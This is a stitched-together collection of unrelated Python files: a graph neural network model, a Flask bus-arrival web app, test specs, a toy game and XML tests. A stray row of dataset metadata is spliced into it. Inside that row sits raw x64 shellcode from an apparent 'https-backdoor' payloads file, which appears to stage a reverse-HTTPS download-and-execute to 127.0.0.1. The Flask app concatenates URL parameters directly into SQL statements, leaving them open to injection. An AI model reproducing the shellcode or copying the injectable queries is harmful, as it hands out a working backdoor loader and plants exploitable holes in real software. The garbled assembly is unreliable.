    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        edgeMatrices = [g.adjacency_matrix(etype=t) for t in self.etypes]
        edges = torch.cat(edgeMatrices, 1).to_dense()
        h = torch.cat((h, edges), 1)
        for i, layer in enumerate(self.layers):
            h = self.activation(layer(h))
        scene_embedding = torch.sum(h, dim=0).view(1, -1)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
class Metric_att_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(Metric_att_Action, self).__init__()
        self.etypes = etypes
        self.name = "Metric_att_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(nn.Linear(in_feats + n_objects * 4, n_hidden))
        for i in range(n_layers - 1):
            self.layers.append(nn.Linear(n_hidden, n_hidden))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects + 1)
        self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects + 1 + n_states)
        self.activation = nn.LeakyReLU()

    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        edgeMatrices = [g.adjacency_matrix(etype=t) for t in self.etypes]
        edges = torch.cat(edgeMatrices, 1).to_dense()
        h = torch.cat((h, edges), 1)
        for i, layer in enumerate(self.layers):
            h = self.activation(layer(h))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
        attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
        scene_embedding = torch.mm(attn_weights.t(), h)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()


# ===== index.py (repo: Brankhos/akilli_durak, MIT license) =====
from flask import Flask, request
import configs
import mysql.connector
from mysql.connector import errorcode
import numpy as np
import math
from math import pi


def shift(arr, num=1, fill_value=np.nan):
    result = np.empty_like(arr)
    if num > 0:
        result[:num] = fill_value
        result[num:] = arr[:-num]
    elif num < 0:
        result[num:] = fill_value
        result[:num] = arr[-num:]
    else:
        result[:] = arr
    return result


config = {
    'user': 'root',
    'password': '',
    'host': 'localhost',
    'raise_on_warnings': True
}

try:
    cnx = mysql.connector.connect(**config)
    print("FUTURES: Bağlantı başarılı")
except mysql.connector.Error as err:
    if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
        print("FUTURES: Something is wrong with your user name or password")
    elif err.errno == errorcode.ER_BAD_DB_ERROR:
        print("FUTURES: Database does not exist")
    else:
        print("FUTURES: ", err)

cnx.autocommit = True
refresh = '<meta http-equiv="refresh" content="5">'
app = Flask(__name__)


@app.route("/")
def home():
    cursor = cnx.cursor()
    try:
        cursor.execute("USE {}".format(configs.durak_db))
    except mysql.connector.Error as err:
        print("Durak: Database {} does not exists.".format(configs.durak_db))
    durak_text = "<h1>Durak seçiniz</h1>"
    cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema = 'duraklar'")
    records_all = cursor.fetchall()
    duraklar = "<br>".join("<a href=\"durak_no=" + x[2] + "\">" + x[2][0:4] + " | " + x[2][4:].replace("_", " ").upper() + "</a>" for x in records_all)
    html = refresh + durak_text + duraklar
    cursor.close()
    return html
@app.route("/debug")
def debug():
    cursor = cnx.cursor()
    try:
        cursor.execute("USE {}".format(configs.durak_db))
    except mysql.connector.Error as err:
        print("Durak: Database {} does not exists.".format(configs.durak_db))
    durak_text = "<h1>Durak seçiniz</h1>"
    cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema = 'duraklar'")
    records_all = cursor.fetchall()
    duraklar = "<br>".join("<a href=\"debug_durak_no=" + x[2] + "\">" + x[2][0:4] + " | " + x[2][4:].replace("_", " ").upper() + "</a>" for x in records_all)
    html = refresh + durak_text + duraklar
    cursor.close()
    return html
@app.route("/durak_no=<durak_no>")
def otobus(durak_no):
    cursor = cnx.cursor()
    print("-----------------")
    try:
        cursor.execute("USE {}".format(configs.durak_db))
    except mysql.connector.Error as err:
        print("Otobus: Database {} does not exists.".format(configs.durak_db))
    cursor.execute("SELECT `otobus_no` FROM `" + durak_no + "`")
    otobus_nolar = np.array(cursor.fetchall())
    otobus_nolar = otobus_nolar.flatten()
    try:
        cursor.execute("USE {}".format(configs.otobus_db))
    except mysql.connector.Error as err:
        print("Otobus: Database {} does not exists.".format(configs.otobus_db))
    oto_list_array = np.array([])
    for otobusler in otobus_nolar:
        try:
            last_kalan_sure = 999
            last_summe_text = ""
            for max_oto in range(1, 50):
                kalan_sure = 999
                stop_it = 0
                exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `ulasildi` = '0' and id <= {int(durak_no[1:4])}"
                cursor.execute(exe_text)
                otobus_bilgisi = np.array(cursor.fetchall())
                otobus_bilgisi = np.transpose(otobus_bilgisi)
                otobus_x = otobus_bilgisi[1]
                otobus_y = otobus_bilgisi[2]
                otobus_x_shift = shift(otobus_x, fill_value=0)[1:]
                otobus_y_shift = shift(otobus_y, fill_value=0)[1:]
                otobus_y = otobus_y[1:]
                otobus_x = otobus_x[1:]
                # print(otobus_x)
                # print(otobus_x_shift)
                summe = np.array([])
                for otob_index in range(otobus_y_shift.shape[0]):
                    # enlem x (latitude)
                    # boylam y (longitude)
                    lat1 = otobus_x[otob_index]
                    long1 = otobus_y[otob_index]
                    lat2 = otobus_x_shift[otob_index]
                    long2 = otobus_y_shift[otob_index]
                    # Great-circle distance (spherical law of cosines), Earth radius 6371 km
                    d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
                    # https://qastack.info.tr/programming/13026675/calculating-distance-between-two-points-latitude-longitude
                    summe = np.append(summe, d)
                summe = np.sum(summe)
                otobus_hiz = otobus_bilgisi[4][0]
                if otobus_hiz < 10:
                    otobus_hiz = 10
                if summe == 0:
                    exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `id` = {int(durak_no[1:4])} or `id` = 0"
                    cursor.execute(exe_text)
                    sifir_oto = np.transpose(np.array(cursor.fetchall()))
                    lat1 = sifir_oto[1][0]
                    long1 = sifir_oto[2][0]
                    lat2 = sifir_oto[1][1]
                    long2 = sifir_oto[2][1]
                    d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
                    if d < 0.035:
                        kalan_sure_text = "Geldi"
                        stop_it = 1
                    else:
                        kalan_sure_text = "Geçti"
                        stop_it = 0
                else:
                    kalan_sure = summe / otobus_hiz
                    kalan_saat = int(kalan_sure)
                    kalan_dakika = (kalan_sure % 1) * 60
                    kalan_saniye = (kalan_dakika % 1) * 60
                    if kalan_saat == 0:
                        kalan_saat_text = ""
                    else:
                        kalan_saat_text = "{} st ".format(int(kalan_saat))
                    if kalan_dakika == 0:
                        kalan_dakika_text = ""
                    else:
                        kalan_dakika_text = "{} dk ".format(int(kalan_dakika))
                    if kalan_saniye == 0:
                        kalan_saniye_text = ""
                    else:
                        kalan_saniye_text = "{} sn".format(int(kalan_saniye))
                    kalan_sure_text = kalan_saat_text + kalan_dakika_text + kalan_saniye_text
                if kalan_sure < last_kalan_sure or summe == 0 or last_summe_text == "Geçti":
                    if max_oto != 1 or last_summe_text == "Geçti":
                        oto_list_array = oto_list_array[:-1]
                    oto_list_array = np.append(oto_list_array, f"{otobusler} | {kalan_sure_text}")
                    last_kalan_sure = kalan_sure
                print(last_summe_text, "last_summe_text")
                last_summe_text = kalan_sure_text
                print(otobusler, kalan_sure_text, summe, otobus_hiz, "alt")
                print(oto_list_array, "last one")
                if stop_it == 1:
                    break
        except Exception as a:
            print(a)
    print(oto_list_array)
    html_head = "Durak numarası: {}<br>Durak adı: {}".format(durak_no[:4], durak_no[4:].replace("_", " ").upper())
    html_oto_list = "<br>" + "<br>".join(x for x in oto_list_array)
    html = refresh + html_head + html_oto_list
    cursor.close()
    return html
@app.route("/debug_durak_no=<durak_no>")
def debug_durak_no(durak_no):
    cursor = cnx.cursor()
    print("-----------------")
    try:
        cursor.execute("USE {}".format(configs.durak_db))
    except mysql.connector.Error as err:
        print("Otobus: Database {} does not exists.".format(configs.durak_db))
    cursor.execute("SELECT `otobus_no` FROM `" + durak_no + "`")
    otobus_nolar = np.array(cursor.fetchall())
    otobus_nolar = otobus_nolar.flatten()
    try:
        cursor.execute("USE {}".format(configs.otobus_db))
    except mysql.connector.Error as err:
        print("Otobus: Database {} does not exists.".format(configs.otobus_db))
    oto_list_array = np.array([])
    for otobusler in otobus_nolar:
        try:
            last_kalan_sure = 999
            last_summe_text = ""
            for max_oto in range(1, 50):
                kalan_sure = 999
                exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `ulasildi` = '0' and id <= {int(durak_no[1:4])}"
                cursor.execute(exe_text)
                otobus_bilgisi = np.array(cursor.fetchall())
                otobus_bilgisi = np.transpose(otobus_bilgisi)
                otobus_x = otobus_bilgisi[1]
                otobus_y = otobus_bilgisi[2]
                otobus_x_shift = shift(otobus_x, fill_value=0)[1:]
                otobus_y_shift = shift(otobus_y, fill_value=0)[1:]
                otobus_y = otobus_y[1:]
                otobus_x = otobus_x[1:]
                # print(otobus_x)
                # print(otobus_x_shift)
                summe = np.array([])
                for otob_index in range(otobus_y_shift.shape[0]):
                    # enlem x (latitude)
                    # boylam y (longitude)
                    lat1 = otobus_x[otob_index]
                    long1 = otobus_y[otob_index]
                    lat2 = otobus_x_shift[otob_index]
                    long2 = otobus_y_shift[otob_index]
                    d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(
                        pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(
                        pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
                    # https://qastack.info.tr/programming/13026675/calculating-distance-between-two-points-latitude-longitude
                    summe = np.append(summe, d)
                summe = np.sum(summe)
                otobus_hiz = otobus_bilgisi[4][0]
                if otobus_hiz < 10:
                    otobus_hiz = 10
                if summe == 0:
                    exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `id` = {int(durak_no[1:4])} or `id` = 0"
                    cursor.execute(exe_text)
                    sifir_oto = np.transpose(np.array(cursor.fetchall()))
                    lat1 = sifir_oto[1][0]
                    long1 = sifir_oto[2][0]
                    lat2 = sifir_oto[1][1]
                    long2 = sifir_oto[2][1]
                    d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(
                        pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(
                        pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
                    if d < 0.035:
                        kalan_sure_text = "Geldi"
                    else:
                        kalan_sure_text = "Geçti"
                else:
                    kalan_sure = summe / otobus_hiz
                    kalan_saat = int(kalan_sure)
                    kalan_dakika = (kalan_sure % 1) * 60
                    kalan_saniye = (kalan_dakika % 1) * 60
                    if kalan_saat == 0:
                        kalan_saat_text = ""
                    else:
                        kalan_saat_text = "{} st ".format(int(kalan_saat))
                    if kalan_dakika == 0:
                        kalan_dakika_text = ""
                    else:
                        kalan_dakika_text = "{} dk ".format(int(kalan_dakika))
                    if kalan_saniye == 0:
                        kalan_saniye_text = ""
                    else:
                        kalan_saniye_text = "{} sn".format(int(kalan_saniye))
                    kalan_sure_text = kalan_saat_text + kalan_dakika_text + kalan_saniye_text
                oto_list_array = np.append(oto_list_array, f"{otobusler} | {kalan_sure_text}")
                last_kalan_sure = kalan_sure
                print(last_summe_text, "last_summe_text")
                last_summe_text = kalan_sure_text
                print(otobusler, kalan_sure_text, summe, otobus_hiz, "alt")
                print(oto_list_array, "last one")
        except Exception as a:
            print(a)
    print(oto_list_array)
    html_head = "Durak numarası: {}<br>Durak adı: {}".format(durak_no[:4], durak_no[4:].replace("_", " ").upper())
    html_oto_list = "<br>" + "<br>".join(x for x in oto_list_array)
    html = refresh + html_head + html_oto_list
    cursor.close()
    return html
@app.route("/guncelle", methods=['GET'])
def guncelle():
    cursor = cnx.cursor()
    otobus = request.args.get('otobus', None)
    x = request.args.get('x', None)
    y = request.args.get('y', None)
    hiz = request.args.get('hiz', None)
    print(otobus, x, y, hiz)
    try:
        cursor.execute("USE {}".format(configs.otobus_db))
    except mysql.connector.Error as err:
        print("Otobus: Database {} does not exists.".format(configs.otobus_db))
    cursor.execute("UPDATE `" + otobus + "` SET x = '" + x + "',y = '" + y + "',durak = '" + hiz + "' WHERE id = '0' ")
    cursor.execute(f"SELECT * FROM {otobus} WHERE `ulasildi` ='0' and `durak` ='1'")
    Result = cursor.fetchall()
    for data in Result:
        lat1 = data[1]
        long1 = data[2]
        lat2 = float(x)
        long2 = float(y)
        d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(
            pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
        if d < 0.035:
            cursor.execute(f"UPDATE {otobus} SET ulasildi ='1' WHERE `id` ='{data[0]}'")
    cursor.close()
    return "ok"
if __name__ == "__main__":
    # This is used when running locally only. When deploying to Google App
    # Engine, a webserver process such as Gunicorn will serve the app.
    app.run(host='127.0.0.1', port=8080, debug=True)
# [END gae_flex_quickstart]


# ===== tods/__init__.py (repo: ZhuangweiKang/tods, Apache-2.0 license) =====
from .utils import *
from tods.data_processing import *
from tods.timeseries_processing import *
from tods.feature_analysis import *
from tods.detection_algorithm import *
from tods.sk_interface import *
# ---- payloads/https_shellnoob.py (zeralight/https-backdoor, Apache-2.0) ----
] | 1 | 2020-06-28T14:24:52.000Z | 2020-06-28T14:24:52.000Z | \xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c\x77\x26\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31\xc0\x4d\x31\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5\xe8\x0a\x00\x00\x00\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x5a\x48\x89\xc1\x49\xc7\xc0\xfb\x20\x00\x00\x4d\x31\xc9\x53\x53\x6a\x03\x53\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\xd5\xe8\xf1\x00\x00\x00\x2f\x6d\x72\x38\x77\x51\x59\x73\x6e\x4a\x45\x49\x4c\x4b\x67\x6f\x6f\x55\x4e\x75\x71\x4e\x51\x46\x52\x59\x62\x6c\x39\x71\x4d\x78\x53\x33\x53\x30\x63\x79\x37\x6c\x39\x64\x32\x47\x41\x6e\x65\x39\x57\x62\x42\x4e\x4a\x78\x59\x57\x33\x45\x57\x51\x35\x57\x6f\x79\x4b\x37\x38\x64\x4a\x59\x62\x4e\x62\x7a\x32\x31\x67\x4b\x6c\x4b\x53\x41\x76\x70\x79\x55\x66\x2d\x61\x5f\x72\x6c\x48\x71\x63\x59\x4f\x5a\x73\x30\x75\x64\x54\x59\x35\x58\x4d\x31\x4c\x69\x71\x77\x32\x43\x31\x4a\x43\x35\x6a\x62\x72\x74\x77\x76\x57\x6b\x44\x2d\x33\x43\x2d\x6a\x46\x65\x54\x66\x67\x78\x74\x43\x4f\x79\x54\x62\x41\x6c\x47\x63\x55\x68\x46\x39\x50\x49\x37\x52\x45\x4f\x51\x48\x57\x79\x78\x
71\x78\x57\x45\x4f\x70\x39\x36\x5f\x32\x33\x6d\x4d\x47\x42\x47\x6a\x69\x2d\x42\x50\x36\x68\x44\x69\x69\x4b\x4a\x71\x30\x59\x4c\x5a\x6e\x54\x73\x65\x51\x6a\x42\x5f\x39\x46\x76\x59\x78\x73\x66\x6d\x72\x6d\x49\x79\x5a\x68\x6c\x6b\x59\x79\x64\x77\x68\x41\x6a\x34\x67\x45\x4a\x4c\x36\x78\x67\x4a\x61\x42\x72\x32\x00\x48\x89\xc1\x53\x5a\x41\x58\x4d\x31\xc9\x53\x48\xb8\x00\x32\xa0\x84\x00\x00\x00\x00\x50\x53\x53\x49\xc7\xc2\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x6a\x1f\x5a\x52\x68\x80\x33\x00\x00\x49\x89\xe0\x6a\x04\x41\x59\x49\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x4d\x31\xc0\x53\x5a\x48\x89\xf1\x4d\x31\xc9\x4d\x31\xc9\x53\x53\x49\xc7\xc2\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1f\x48\xc7\xc1\x88\x13\x00\x00\x49\xba\x44\xf0\x35\xe0\x00\x00\x00\x00\xff\xd5\x48\xff\xcf\x74\x02\xeb\xaa\xe8\x55\x00\x00\x00\x53\x59\x6a\x40\x5a\x49\x89\xd1\xc1\xe2\x10\x49\xc7\xc0\x00\x10\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\x00\x20\x00\x00\x49\x89\xf9\x49\xba\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb2\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd2\x58\xc3\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5 | 3,160 | 3,160 | 0.75 | 790 | 3,160 | 3 | 0.201266 | 0.096203 | 0.075949 | 0.035443 | 0.117722 | 0.102532 | 0.079747 | 0 | 0 | 0 | 0 | 0.400949 | 0 | 3,160 | 1 | 3,160 | 3,160 | 0.349051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# ---- tests/utils/test_git.py (brentyi/hfdsajk, MIT) ----
import fannypack

def test_get_git_commit_hash():
    """Checks that we can read this file's commit hash."""
    assert len(fannypack.utils.get_git_commit_hash(__file__)) == 40
# ---- chainer_compiler/elichika/testtools/__init__.py (durswd/chainer-compiler, MIT) ----
from chainer_compiler.elichika.testtools.testcasegen import generate_testcase
from chainer_compiler.elichika.testtools.canonicalizer_tools import compare_ast, assert_semantically_equals
from chainer_compiler.elichika.testtools.type_checker_tools import generate_id2type_from_forward
# ---- spec/errors_in_hooks_spec.py (quiqueporta/mamba, MIT) ----
from expects import *
from doublex import *
from mamba import reporter
from spec.object_mother import *

with description('Errors in hooks'):

    with before.each:
        self.reporter = Spy(reporter.Reporter)
        self.example_group = an_example_group()

    with context('when an error was raised in a before.all hook'):
        with before.each:
            self.example_group.hooks['before_all'].append(self._error)

        with it('marks example as failed'):
            self.example = an_example()
            self.example_group.append(self.example)
            self.example_group.run(self.reporter)

            expect(self.example.error).not_to(be_none)

        with context('when example also launches an error'):
            with context('when before.each also launches an error'):
                with it('keeps the error happened in first hook'):
                    self.example_group.hooks['before_each'].append(self._other_error)
                    self.example = a_failing_example()
                    self.example_group.append(self.example)
                    self.example_group.run(self.reporter)

                    expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)

            with it('keeps the error happened in hook'):
                self.example = a_failing_example()
                self.example_group.append(self.example)
                self.example_group.run(self.reporter)

                expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)

    with context('when an error was raised in a before.each hook'):
        with before.each:
            self.example_group.hooks['before_each'].append(self._error)

        with it('marks example as failed'):
            self.example = an_example()
            self.example_group.append(self.example)
            self.example_group.run(self.reporter)

            expect(self.example.error).not_to(be_none)

        with context('when example also launches an error'):
            with it('keeps the error happened in hook'):
                self.example = a_failing_example()
                self.example_group.append(self.example)
                self.example_group.run(self.reporter)

                expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)

    with context('when an error was raised in an after.each hook'):
        with before.each:
            self.example_group.hooks['after_each'].append(self._error)

        with it('marks example as failed'):
            self.example = an_example()
            self.example_group.append(self.example)
            self.example_group.run(self.reporter)

            expect(self.example.error).not_to(be_none)

        with context('when example also launches an error'):
            with it('keeps the error happened in example'):
                self.example = a_failing_example()
                self.example_group.append(self.example)
                self.example_group.run(self.reporter)

                expect(isinstance(self.example.error.exception, ValueError)).to(be_true)

    with context('when an error was raised in an after.all hook'):
        with before.each:
            self.example_group.hooks['after_all'].append(self._error)

        with it('marks example as failed'):
            self.example = an_example()
            self.example_group.append(self.example)
            self.example_group.run(self.reporter)

            expect(self.example.error).not_to(be_none)

        with context('when example also launches an error'):
            with context('when after.each also launches an error'):
                with it('keeps the error happened in last hook'):
                    self.example_group.hooks['after_each'].append(self._other_error)
                    self.example = a_failing_example()
                    self.example_group.append(self.example)
                    self.example_group.run(self.reporter)

                    expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)

            with it('keeps the error happened in last hook'):
                self.example = a_failing_example()
                self.example_group.append(self.example)
                self.example_group.run(self.reporter)

                expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)

    def _error(self, *args):
        raise NotImplementedError()

    def _other_error(self, *args):
        raise IOError()
# ---- rock&paper&scissors.py (supermangibi/Rock-Paper-Scissor, MIT) ----
import random
rps = ["rock", "paper", "scissors"]
pc_choice = random.choice(rps)
user_choice = ""


def game():
    user_choice = input("Rock/paper/scissors ?")
    if user_choice.lower() == "rock" and pc_choice == "rock":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("even")
    elif user_choice.lower() == "rock" and pc_choice == "paper":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("lose")
    elif user_choice.lower() == "rock" and pc_choice == "scissors":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("win")
    elif user_choice.lower() == "paper" and pc_choice == "rock":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("win")
    elif user_choice.lower() == "paper" and pc_choice == "paper":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("even")
    elif user_choice.lower() == "paper" and pc_choice == "scissors":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("lose")
    elif user_choice.lower() == "scissors" and pc_choice == "rock":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("lose")
    elif user_choice.lower() == "scissors" and pc_choice == "paper":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("win")
    elif user_choice.lower() == "scissors" and pc_choice == "scissors":
        print("artificial intelligence's choice was: " + str(pc_choice))
        print("even")


game()
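The nine-way elif chain in the game above can be collapsed into a single "beats" table; a minimal sketch of the same decision logic (the function and dict names are illustrative, not part of the original script):

```python
# Each key beats the move it maps to.
BEATS = {"rock": "scissors", "paper": "rock", "scissors": "paper"}


def outcome(user, pc):
    """Return 'even', 'win' or 'lose' from the player's perspective."""
    if user == pc:
        return "even"
    return "win" if BEATS[user] == pc else "lose"
```

With this table, adding a new move (e.g. for rock-paper-scissors-lizard-Spock variants) only changes the data, not the control flow.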
# ---- grapher/alangrapher_utils_tests.py (tajmone/alan, Artistic-2.0) ----
#!/usr/bin/env python
from xml.dom import minidom
import unittest

from alangrapher_utils import is_location, get_locations, get_exits, dot_for_location_header


class AlangrapherUtilsTests(unittest.TestCase):

    def test_can_see_if_instance_is_location(self):
        document = """<adventure>
            <classes>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)
        instance = xmltree.getElementsByTagName("instance")[0]

        self.assertTrue(is_location(instance, []))

    def test_can_see_if_instance_inherits_directly_from_class_inheriting_from_location(self):
        document = """<adventure>
            <classes>
                <class NAME='location_class' PARENT='location'>
                </class>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location_class'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)
        instance = xmltree.getElementsByTagName("instance")[0]

        self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))

    def test_can_see_if_instance_inherits_directly_from_class_inheriting_from_location_uppercase(self):
        document = """<adventure>
            <classes>
                <class NAME='location_class' PARENT='LOCATION'>
                </class>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location_class'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)
        instance = xmltree.getElementsByTagName("instance")[0]

        self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))

    def test_can_see_if_instance_inherits_indirectly_from_class_inheriting_from_location(self):
        document = """<adventure>
            <classes>
                <class NAME='location_class_parent' PARENT='location'>
                </class>
                <class NAME='location_class' PARENT='location_class_parent'>
                </class>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location_class'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)
        instance = xmltree.getElementsByTagName("instance")[0]

        self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))

    def test_can_return_list_of_locations(self):
        document = """<adventure>
            <classes>
                <class NAME='location_class_parent' PARENT='location'>
                </class>
                <class NAME='location_class' PARENT='location_class_parent'>
                </class>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location_class'></instance>
                <instance NAME='loc2' PARENT='location'></instance>
                <instance NAME='loc3' PARENT='location_class_parent'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)

        self.assertEqual(3, len(get_locations(xmltree, [])))

    def test_can_return_list_of_locations_ignoring_some(self):
        document = """<adventure>
            <classes>
                <class NAME='location_class_parent' PARENT='location'>
                </class>
                <class NAME='location_class' PARENT='location_class_parent'>
                </class>
            </classes>
            <instances>
                <instance NAME='loc1' PARENT='location_class'></instance>
                <instance NAME='loc2' PARENT='location'></instance>
                <instance NAME='loc3' PARENT='location_class_parent'></instance>
            </instances>
        </adventure>"""
        xmltree = minidom.parseString(document)

        self.assertEqual(2, len(get_locations(xmltree, ['loc1'])))

    def test_can_find_exits_in_location_instance(self):
        document = """<adventure>
            <instances>
                <instance NAME='loc1' PARENT='location'>
                    <exit DIRECTION='e' TARGET='loc2'></exit>
                    <exit DIRECTION='w' TARGET='loc3' />
                </instance>
            </instances>
        </adventure>"""
